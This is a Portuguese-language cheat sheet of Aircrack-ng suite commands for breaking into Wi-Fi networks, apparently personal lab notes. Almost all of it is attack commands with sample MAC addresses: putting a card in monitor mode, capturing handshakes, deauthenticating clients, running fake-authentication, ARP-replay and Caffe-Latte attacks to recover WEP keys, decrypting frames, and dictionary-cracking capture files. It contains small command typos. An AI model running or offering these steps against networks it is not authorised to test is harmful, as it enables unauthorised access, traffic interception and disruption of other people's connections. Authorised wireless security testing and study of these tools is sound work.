Aircrack-ng (teste)
iwlist wlan0 scan (opcional - iwlist wlan0 scan | head -11 [para abrir só as 11 primeiras linhas)
airmon-ng start wlan0
airmon-ng check kill wlan0mon
iwconfig
tcpdump -vv -nn -i wlan0
aircrack-ng check kill
airodump-ng -M wlan0mon --ignore-negative-one
airodump-ng -c "channel" --bssid "alvo" -w "nomearquivo" wlan0mon --ignore-negative-one
Desconecte algum usuárioc/ alguma dessas opções:
Para captura de handshake eficiente use:
aireplay-ng -1 6000 -e "nome rede" -a "bssid" -h "station" wlan0mon --ignore-negative-one
Outras variantes para aireplay-ng:
aireplay-ng -1 0 -e "nome da rede" -a "bssid alvo" -h 02:54:2d:31:55:96 wlan0mon
aireplay-ng --deauth 50 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 wlan0mon
ou
aireplay-ng --deauth 100 -a 7C:05:07:DE:6E:6A -e 60:AB:67:FF:42:A4 wlan0mon
PARA OBTER A CHAVE WEP DIRETAMENTE:
aireplay-ng --caffe-latte -e defhack -c C4:27:95:BD:29:3C wlan0
Você pode usar os seguintes comandos durante ataque inicial:
airdump-ng --bssid C4:27:95:BD:29:3C --channel 6 --write WEPquebra wlan0
Lembre-se (5000 a 10000 IVs são suficientes para quebrar uma chave de 40bits e de 20000 a 30000 IVs para uma chave de 104 bits.)
Injete Requisições ARP com o Aireplay-ng
(Importante: o airodump-ng deve continuar rodando em outra janela)
aireplay-ng --arpreplay -b C4:27:95:BD:29:3C -h [station] wlan0
Aṕos parar os programas:
ls WEP* -l
(arquivos c/ 1 foram gerados c/ menos de 20000 IVs, com 2 são justamente os gerados na última execução, na qual consegui 20000 IVs)
aircrack-ng WEPquebra-02.cap
Decodificar frames c/ airdecap-ng:
airdecap-ng -w C4:27:95:BD:29:3C <arquivo.cap>
ATAQUE CAFFE-LATTE:
aireplay-ng --caffe-latte -e defhack -c C4:27:95:BD:29:3C wlan0
1: Mensagem de falsa autenticação;
0: Tempo de reassociação em segundos;
-e: "Nome da rede"
-a: "bssid alvo" MAC do AP (alvo)
-h: 02:54:2d:31:55:96 Endereço MAC da interface wlan0;
(para encontrar a senha no arquivo cap)
a) Usando apenas aircrack-ng:
aircrack-ng -w "worlist" -b "bssid alvo" arquivo.cap
b) Criando sessão com aircrack-ng:
aircrack-ng --new-session current.session -w "wordlist" "arquivo.cap"
Para restaurar a sessão, use --restore-session:
Last updated